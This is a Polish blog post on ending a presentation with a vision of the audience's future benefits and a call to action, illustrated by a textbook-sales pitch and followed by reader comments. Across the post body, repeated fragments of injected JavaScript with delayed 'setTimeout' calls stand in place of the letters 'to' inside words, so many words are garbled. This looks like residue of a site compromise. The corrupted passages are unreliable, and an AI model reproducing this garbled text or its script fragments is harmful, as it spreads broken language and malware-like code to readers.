“Prawdziwego mówcę poznaję się nie po tym, jak zaczyna ale jak kończy swoje wystąpienie”. Tak można by sparafrazować zdanie wygłoszone kilka lat temu przez byłego premiera Leszka Millera. Jak kończy on swoją karierę polityczną, wszyscy widzimy. Mam nadzieję, że Ty lepiej kończysz swoje prezentacje 🙂 Jeśli potrzebujesz nadom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tomiast pomysłu na intrygujące zakończenie wystąpienie, obejrzyj moje nagranie:
Jeśli film będzie się zawieszał wciśnij pauzę i poczekaj aż się załaduje.
Jeśli film Ci się podoba, kliknij “Lubię dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to”. Możesz subskrybować mój kanał na You Tube (ikonka YT na prawym pasku bloga, na górze)
Transkrypt nagrania:
Publiczność naturalnie skoncentrowana jest na starcie naszej prezentacji ale w jej trakcie ta koncentracja spada. Nam bardzo zależy na tym aby kończąc wystąpienia znowu zmusić ludzi do uwagi na dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to co mówimy.
W tej sytuacji, gdy zbliżamy się do naszego powalającego zakończenia, powinniśmy poinformować o tym naszych widzów słowami:
kończąc,
podsumowując,
na zakończenie…
Tymi słowami zapewniamy sobie uwagę audydom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}torium. Ludzie są wtedy godom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}towi na nasze mocne zakończenie.
“Moje powalające zakończenie” łączy w sobie dwie rzeczy:
1. wizualizację. Pokazuję przyszłość słuchaczy i jakie odnoszą korzyści z używania moich produktów, zakupu usługi.
2. wezwanie do akcji. Ludzie muszą wiedzieć co mają zrobić aby ta przyszłość, opisana przeze mnie, mogła nastąpić.
Przykład z mojego podwórka (pracuję w wydawnictwie oświadom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}towym, prowadzę prezentacje podręczników szkolnych czyli namawiam nauczycieli aby korzystali z książek wydawnictwa w którym pracuję)
Na koniec prezentacji mówię:
Myślę o naszym spotkaniu za rok. Podchodzi do mnie jedna z nauczycielek obecnych na dzisiejszej prezentacji i mówi: “Panie Robercie, po pana szkoleniu zdecydowałam się na uczenie z waszych podręczników. I wie Pan co? Nie żałuję tego! mam więcej czasu dla najbliższych bo bardzo szybko przygodom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}towuje się do zajęć. Książki bardzo podobają się też moim uczniom. Mają lepsze oceny. Ja, dodatkowo korzystam z waszych programów multimedialnych i zasobów strony internedom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}towej. Nie wspominam już o rozbudowanej obudowie medom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}todycznej. Nie wiem jak do tej pory mogłam uczyć z książek innych wydawnictw…”
Tu robię krótką pauzę. [teraz przyszedł czas na wezwanie ludzi do działania]:
Jeśli kdom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toś z Państwa jest zainteresowany naszymi podręcznikami, proszę skontakdom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tować się z naszym biurem obsługi klienta – telefon i adres mejlowy wyświetlam na ekranie. Otrzymają Państwo od nas zestawy próbne czyli książki i zeszyty ćwiczeń oraz broszury, z których mogą państwo poprowadzić lekcje. Na podstawie tych materiałów mogą Państwo podjąć decyzję o korzystaniu z naszych książek
To wszystko: opisanie korzyści słuchaczy w przyszłości i wezwanie ich do wykonania pierwszego kroku aby ta “zwizualizowana” przyszłość stała się rzeczywisdom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tością.
To naprawdę działa!
– – – – – – – – – – – – – – – – – —
W drugiej części nagrania zachęcam widzów do udziału w szkoleniu 11 grudnia pt. “Jak zorganizować szkolenie i na nim zarobić”. Link do strony z ofertą szkolenia jest pod filmem.
Trzecia część filmu dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to rozstrzygnięcie konkursu dla komentadom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}torów na moim blogu. Nagrody – książki “Nie boję się mówić”, mojego audom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}torstwa wygrali: Krystian oraz Anna Wójcik.
Ich wpisy możesz przeczytać pod wpisem
Jak radzić sobie ze stresem w wystąpieniach publicznych
pozdrawiam!
![]() |
Wpis Ci się podobał?
Świeżutkie artykuły i filmy na temat prezentacji i rozwoju osobistego wprost na Twoją skrzynkę!
Jak miło otrzymywać prezenty 😉
A pomysł z wykorzystaniem wizji przyszłości i zmotywowania do akcji super!
Pozdrawiam.
Cześć Gosiu!
Mail z Raportem Specjalnym powinien już do Ciebie dotrzeć (jak i do pozostałych komentatorów).
Co do zakończenia prezentacji to w jednym z najbliższych filmów, pokażę wam kilka innych pomysłów na zakończenie choć ten zaprezentowany właśnie na ty filmie jest chyba najefektowniejszy. Nie wszyscy jednak czują się na tyle mocno w prezentacjach, aby stosować bardziej zaawansowane, rozbudowane techniki. Dla nich będą te odrobinę prostsze pomysły. One też działają!
Jeszcze raz pozdrawiam i proszę o kolejne komentarze.
Robert
Witam serdecznie, właśnie obejrzałam kilka Pana filmików, które wzbudzily moje zainteresowanie, zresztą to miały na zamiarze i dobrze, bo szukam pomocy do stworzenia swojego szkolenia z autoprezentacji na zajęcia do swojej szkoły w której już kończę studium BHP. Miałam problem z metodami aktywizującymi ale teraz myślę że już go nie mam:) Pozdrawiam serdecznie i życzę dalszych sukcesów w swojej pracy
Joasiu,
dziękuję za spontaniczny komentarz! z Twojego nastroju wnoszę, że materiały się przydały 🙂 taki jest cel mojej działalności – aby jak najwięcej osób znajdowało przyjemność w przemawianiu do innych.
pozdrawiam serdecznie i życzę powodzenia
Witam ponownie:) Oczywiście materiały się przydały i wszystko poszło jak trzeba. Moje szkolenie zaliczyłam:) Myślę, że Pańskie materiały będą mi jeszcze długo pomocne w przyszłej pracy, poza tym napewno pojawią się nowe pomysły, a jeśli sama na coś fajnego wpadnę to podzielę się pomysłem z miłą chęcią.
Pozdrawiam serdecznie i życzę miłego dnia 🙂
Joasiu,
dziel się swoimi doświadczeniami na blogu! Tak właśnie rozumiem funkcjonowanie tajników prezentacji. pomagamy sobie.
pozdrawiam serdecznie
Gratuluję Joanno!
Cieszę się, że wykorzystałaś z sukcesem moje porady. Czekam na Twoje przemyślenia i inspiracje dla czytelników Tajników Prezentacji.
pozdrawiam
Zakończenie posiada elementy andragogiki; pokazanie korzyści jakie uzyskają uczestnicy w zamian za współpracę. Jasne reguły. Super artykuły, mogę sobie z przyjemnościa pracować po przeczytaniu Twoich cennych wskazówek.
Witam serdecznie,
Dziękuję za ten artykuł, właśnie szukałam inspiracji do ostatniego slajdu prezentacji nad którą pracuję. Wizualizacja to strzał w 10, dzięki, z pewnością wykorzystam.
Pozdrawiam
Monika
Cześć Moniko! Jestem przekonany, że prezentacja będzie udana 😉 Napisz proszę, jak poszło!
pozdrawiam serdecznie
Robert